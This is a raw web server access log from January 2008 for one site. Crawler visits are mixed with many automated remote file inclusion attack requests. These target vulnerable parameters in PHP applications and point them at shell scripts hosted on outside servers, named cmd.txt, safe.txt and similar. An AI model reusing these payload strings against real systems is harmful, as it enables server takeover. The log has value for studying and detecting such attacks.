64.76.186.87 - - [18/Jan/2008:15:51:20 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.121.21.39 - - [18/Jan/2008:15:51:41 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [18/Jan/2008:15:51:41 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [18/Jan/2008:15:51:42 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.13 - - [18/Jan/2008:15:53:08 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:54:16 -0800] "GET // HTTP/1.1" 200 2962 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:54:29 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:15:54:50 -0800] "GET /logs/access.log/coppercop/theme.php?THEME_DIR=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:15:54:50 -0800] "GET /coppercop/theme.php?THEME_DIR=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:15:54:51 -0800] "GET /logs/coppercop/theme.php?THEME_DIR=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:55:43 -0800] "GET /logs/access_071217.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.29.81.87 - - [18/Jan/2008:15:57:08 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.north.helloweb.eu/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.70.92 - - [18/Jan/2008:15:59:40 -0800] "GET /logs/index.php?pagina=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:16:01:42 -0800] "GET /logs/access_071220.log/coppercop/theme.php?THEME_DIR=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.19.225.162 - - [18/Jan/2008:16:01:56 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.calvarynorth.com/calendar/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [18/Jan/2008:16:01:56 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.calvarynorth.com/calendar/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [18/Jan/2008:16:01:56 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.calvarynorth.com/calendar/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:16:02:36 -0800] "GET /logs/access_071214.log/becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:16:02:36 -0800] "GET /becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:02:36 -0800] "GET /logs/access_071221.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:16:02:37 -0800] "GET /logs/becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.19.225.162 - - [18/Jan/2008:16:02:39 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.calvarynorth.com/calendar/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:16:02:40 -0800] "GET /logs/access_071228.log/becommunity/community/index.php?pageurl=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:03:01 -0800] "GET /logs/access_071215.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
89.212.80.130 - - [18/Jan/2008:16:03:11 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [18/Jan/2008:16:03:12 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [18/Jan/2008:16:03:12 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:16:04:53 -0800] "GET /logs/access_071231.log/pivot/modules/module_db.php?pivot_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:16:04:53 -0800] "GET /pivot/modules/module_db.php?pivot_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:16:04:54 -0800] "GET /logs/pivot/modules/module_db.php?pivot_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.2.67.151 - - [18/Jan/2008:16:05:48 -0800] "GET //protection.php?action=logout&siteurl=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:07:10 -0800] "GET /logs/access_071220.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:16:08:24 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.omirinda.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.156 - - [18/Jan/2008:16:08:55 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.76.186.87 - - [18/Jan/2008:16:10:52 -0800] "GET /logs/access_080101.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.2.67.151 - - [18/Jan/2008:16:11:00 -0800] "GET /logs/access_071216.log//protection.php?action=logout&siteurl=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.2.67.151 - - [18/Jan/2008:16:11:01 -0800] "GET /logs//protection.php?action=logout&siteurl=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.2.67.151 - - [18/Jan/2008:16:11:02 -0800] "GET /logs/access_071031.log//protection.php?action=logout&siteurl=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.73.67 - - [18/Jan/2008:16:11:07 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:11:31 -0800] "GET /logs/access_071222.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.29.73.67 - - [18/Jan/2008:16:11:56 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [18/Jan/2008:16:11:56 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.67 - - [18/Jan/2008:16:12:50 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:12:56 -0800] "GET /logs/access_071219.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.8.71 - - [18/Jan/2008:16:15:46 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.164.122 - - [18/Jan/2008:16:19:21 -0800] "GET //oneadmin/config.php?path[docroot]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.164.122 - - [18/Jan/2008:16:19:21 -0800] "GET /logs/access_071229.log//oneadmin/config.php?path[docroot]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.164.122 - - [18/Jan/2008:16:19:22 -0800] "GET /logs//oneadmin/config.php?path[docroot]=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.225 - - [18/Jan/2008:16:19:46 -0800] "GET /megumi/earrings/?N=D HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:20:08 -0800] "GET /logs/access_071223.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:21:15 -0800] "GET /logs/access_071216.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:16:21:22 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:16:21:22 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:16:21:22 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.39.226 - - [18/Jan/2008:16:21:24 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.39.226 - - [18/Jan/2008:16:21:24 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.39.226 - - [18/Jan/2008:16:21:24 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.145 - - [18/Jan/2008:16:22:03 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:16:22:28 -0800] "GET /logs/access_080101.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.omirinda.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:16:22:28 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.omirinda.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.91.244.2 - - [18/Jan/2008:16:29:50 -0800] "GET /logs/access_071225.log/components/com_forum/download.php?phpbb_root_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [18/Jan/2008:16:30:23 -0800] "GET /logs/index.php?//?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.85.12.121 - - [18/Jan/2008:16:30:23 -0800] "GET /index.php?//?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:16:31:13 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:16:31:13 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:16:31:14 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.109 - - [18/Jan/2008:16:32:44 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.28.106.195 - - [18/Jan/2008:16:33:04 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [18/Jan/2008:16:33:04 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [18/Jan/2008:16:33:05 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:16:34:20 -0800] "GET /bikes/dteel/ HTTP/1.1" 200 8401 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.216.91.36 - - [18/Jan/2008:16:35:04 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.176.65.4 - - [18/Jan/2008:16:37:13 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
66.176.65.4 - - [18/Jan/2008:16:37:13 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
66.176.65.4 - - [18/Jan/2008:16:37:18 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
66.176.65.4 - - [18/Jan/2008:16:37:44 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:16:40:26 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:16:40:36 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:16:40:37 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:16:40:37 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:16:40:39 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:16:40:39 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:16:40:39 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:16:40:53 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:16:40:53 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:16:40:53 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:16:40:57 -0800] "GET /logs/access_071122.log/general.php?module=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:16:40:57 -0800] "GET /general.php?module=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:16:40:57 -0800] "GET /logs/general.php?module=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:16:41:15 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:16:41:16 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:16:41:16 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:16:41:19 -0800] "GET /logs/access_071229.log/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:16:41:19 -0800] "GET /index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:16:41:19 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:16:41:21 -0800] "GET /logs//////////index.php?autoLoadConfig[999][0][autoType]=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.152.151 - - [18/Jan/2008:16:41:22 -0800] "GET //////////index.php?autoLoadConfig[999][0][autoType]=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:16:41:24 -0800] "GET /logs/index.php?s=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.237.78.72 - - [18/Jan/2008:16:42:01 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.237.78.72 - - [18/Jan/2008:16:42:01 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.237.78.72 - - [18/Jan/2008:16:42:02 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.81.42 - - [18/Jan/2008:16:42:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.237.78.72 - - [18/Jan/2008:16:42:43 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:16:43:08 -0800] "GET /logs/access_080101.log/rfihttp://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:16:43:08 -0800] "GET /rfihttp://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:16:43:09 -0800] "GET /logs/rfihttp://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.237.78.72 - - [18/Jan/2008:16:45:16 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.147.70.69 - - [18/Jan/2008:16:46:53 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://belisusu.50g.com/tools/danang? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.147.70.69 - - [18/Jan/2008:16:46:54 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://belisusu.50g.com/tools/danang? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.147.70.69 - - [18/Jan/2008:16:46:55 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://belisusu.50g.com/tools/danang? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:16:47:01 -0800] "GET /logs/access.log/rfihttp://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:16:47:21 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:16:47:21 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.183.210 - - [18/Jan/2008:16:47:37 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.129 - - [18/Jan/2008:16:48:11 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sisters.or.kr/system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
